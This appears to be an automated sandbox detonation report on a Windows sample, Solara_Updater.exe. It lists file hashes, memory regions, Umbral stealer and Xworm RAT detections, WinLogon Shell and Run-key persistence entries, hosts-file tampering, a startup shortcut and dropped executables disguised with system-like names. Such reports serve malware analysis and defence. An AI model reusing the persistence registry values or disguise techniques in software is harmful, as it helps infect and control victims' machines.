memory/1680-127-0x0000000000390000-0x0000000000398000-memory.dmp

memory/1680-129-0x00000000003A0000-0x00000000003AC000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\f4mf1g3z\f4mf1g3z.cmdline

MD5 06b17038b4ffdb1c2a91fbf470a8f8b0
SHA1 57650bbead875539c147978461e8cc054642e03a
SHA256 134e9722217e09ba35cfec6014dedac332a68030129c3debc385c5244fdf4410
SHA512 e81dc30cfeba1c7fb8d3d048e4c62cb8868a0ae3f05d17117c7d8cf7ba5b60572dc3af0abc60198094e1818edd365e71cb3acb51d5328213cd9a0fd5e9260d10

\??\c:\Users\Admin\AppData\Local\Temp\f4mf1g3z\f4mf1g3z.0.cs

MD5 471dd0cd2229a3094ca7dae5f7100bf7
SHA1 58a13e408fddc5b681204ae3fd4056b17a5d950e
SHA256 790fddcd08c0a035086f5e817dc6b8c816d2ffcb5ac37721c7577602293e467a
SHA512 29148415599f49b7cb9fb0e49d625c2b370b701a70b21a05c5bd653454d14ffd55bb847e75d15088f5889ce6758287ab8eaaf12683dd144dcf16aa246513181a

\??\c:\Windows\System32\CSC2FEC2B28D6C643E49C6489917F1F18A0.TMP

MD5 dc62d02b56d310e294d158c225b91f50
SHA1 844e69b5ff0328e80441c54dbdff39d82c3263ba
SHA256 be8b5c97dc2eb2b7a62245da79d879ac20bb8e123c06b565f27e330bfe4fa0f8
SHA512 23e9004baf3f7dc17611fa3fa65e5c8dbd0c49cb43b831688eec9b938c28a3ca6029d737de77810271ac9f0779c27f62db123d2831aee13527d0a3088c39c209

C:\Users\Admin\AppData\Local\Temp\RES8E99.tmp

MD5 23d39dc9fcb1117b66cdc954e48fe166
SHA1 69c790280c51d4a2bd2b82dfa10f8048e77f1750
SHA256 7ad24b526d9f97012db0c665d84dbb702943fdff6d7ec47ca6cd67ac2e44fc13
SHA512 1d948debf3986b39d3ff8bb5ad56f11e4dc7efa14761a5e8befcb5ac4976980996fcea564908eca480ddee36d23c3b1299f7348bf55e27d0e899d1837b4c9d05

memory/2516-167-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

memory/2516-166-0x000000001B810000-0x000000001BAF2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 98d0f978ec621b8be134f920b9a1d0e1
SHA1 b9cbdbbd61dc8aa8283598eeb6b933261224ef63
SHA256 088f02467ed5d36e1236fb54e5ce7fc625415e6986f696e323ffcf31db107274
SHA512 ee2a834c0078d07a37eb680b74c0a59ec6924ea648ce5a9fed724c4c4675dea82dbb7ee1397e671f2e25b7e135b28a3c8b9ef8667b7cca43ba46bf24d6c85246

memory/1620-174-0x000000001B670000-0x000000001B952000-memory.dmp

memory/1620-176-0x00000000022C0000-0x00000000022C8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Sybwy7Zv6j.bat

MD5 eac4a89eb75f4170ae1451510876abc5
SHA1 13164d0f330723564225ebc0c025ffc48eb1191a
SHA256 b675222a52c57e8549ff5d4721a01f6a0b6a6ea9deb24453fb8fb02108c9e0de
SHA512 475c9144280ed8aa9586e5f45fcdec9e3db0022ef3024376cce7116ed5ca99abe0ebbcebf1c6a6d8e4c490b852384ce06c261d08e227025585a45f987b486006

memory/2648-212-0x0000000002230000-0x0000000002238000-memory.dmp

memory/2648-211-0x000000001B680000-0x000000001B962000-memory.dmp

memory/760-252-0x0000000001060000-0x000000000123E000-memory.dmp

memory/2660-276-0x0000000000110000-0x0000000000150000-memory.dmp

memory/2112-317-0x000000001B520000-0x000000001B802000-memory.dmp

memory/2112-318-0x0000000001CF0000-0x0000000001CF8000-memory.dmp

memory/2872-337-0x0000000000D00000-0x0000000000D40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\35tTTNRjuH9TKKN

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\Local\Temp\DgPGhGiC3k6l1Ws

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\ftYETBfcEQT4i4y\Display\Display.png

MD5 cc4c297af7f8f3f9be4101b8b882d2b0
SHA1 f02bdeefa17cdee08613a700b1b212909140729b
SHA256 c46d2e3be8a68dcbc3f8ebb88a8436d80b27a66822296e15320d2f4650e3f2f3
SHA512 73a8659fe20fa38f66c1cd354456b29945c616a8554758a826e73ce22f759a8963274375e06fc3da9c041c48b5ee68601833e4b092f56809bd6ba5e000537837

memory/2236-381-0x0000000000370000-0x00000000003B0000-memory.dmp

memory/2136-403-0x0000000001250000-0x0000000001266000-memory.dmp

memory/2268-497-0x0000000000800000-0x0000000000840000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 577f27e6d74bd8c5b7b0371f2b1e991c
SHA1 b334ccfe13792f82b698960cceaee2e690b85528
SHA256 0ade9ef91b5283eceb17614dd47eb450a5a2a371c410232552ad80af4fbfd5f9
SHA512 944b09b6b9d7c760b0c5add40efd9a25197c22e302c3c7e6d3f4837825ae9ee73e8438fc2c93e268da791f32deb70874799b8398ebae962a9fc51c980c7a5f5c

memory/2704-588-0x0000000000140000-0x0000000000156000-memory.dmp

memory/484-600-0x0000000000E30000-0x0000000000E70000-memory.dmp

memory/2744-604-0x0000000000390000-0x00000000003BA000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-19 16:15

Reported

2024-05-19 16:18

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Sidebar\\Shared Gadgets\\dllhost.exe\", \"C:\\Program Files (x86)\\Google\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Sidebar\\Shared Gadgets\\dllhost.exe\", \"C:\\Program Files (x86)\\Google\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Windows\\Registration\\CRMLog\\Loader.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Sidebar\\Shared Gadgets\\dllhost.exe\", \"C:\\Program Files (x86)\\Google\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Windows\\Registration\\CRMLog\\Loader.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\RuntimeBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Sidebar\\Shared Gadgets\\dllhost.exe\", \"C:\\Program Files (x86)\\Google\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Windows\\Registration\\CRMLog\\Loader.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\RuntimeBroker.exe\", \"C:\\hostNet\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Sidebar\\Shared Gadgets\\dllhost.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Sidebar\\Shared Gadgets\\dllhost.exe\", \"C:\\Program Files (x86)\\Google\\csrss.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Umbral

stealer umbral

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\Recovery\WindowsRE\RuntimeBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\RuntimeBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe" C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Loader = "\"C:\\Windows\\Registration\\CRMLog\\Loader.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\RuntimeBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
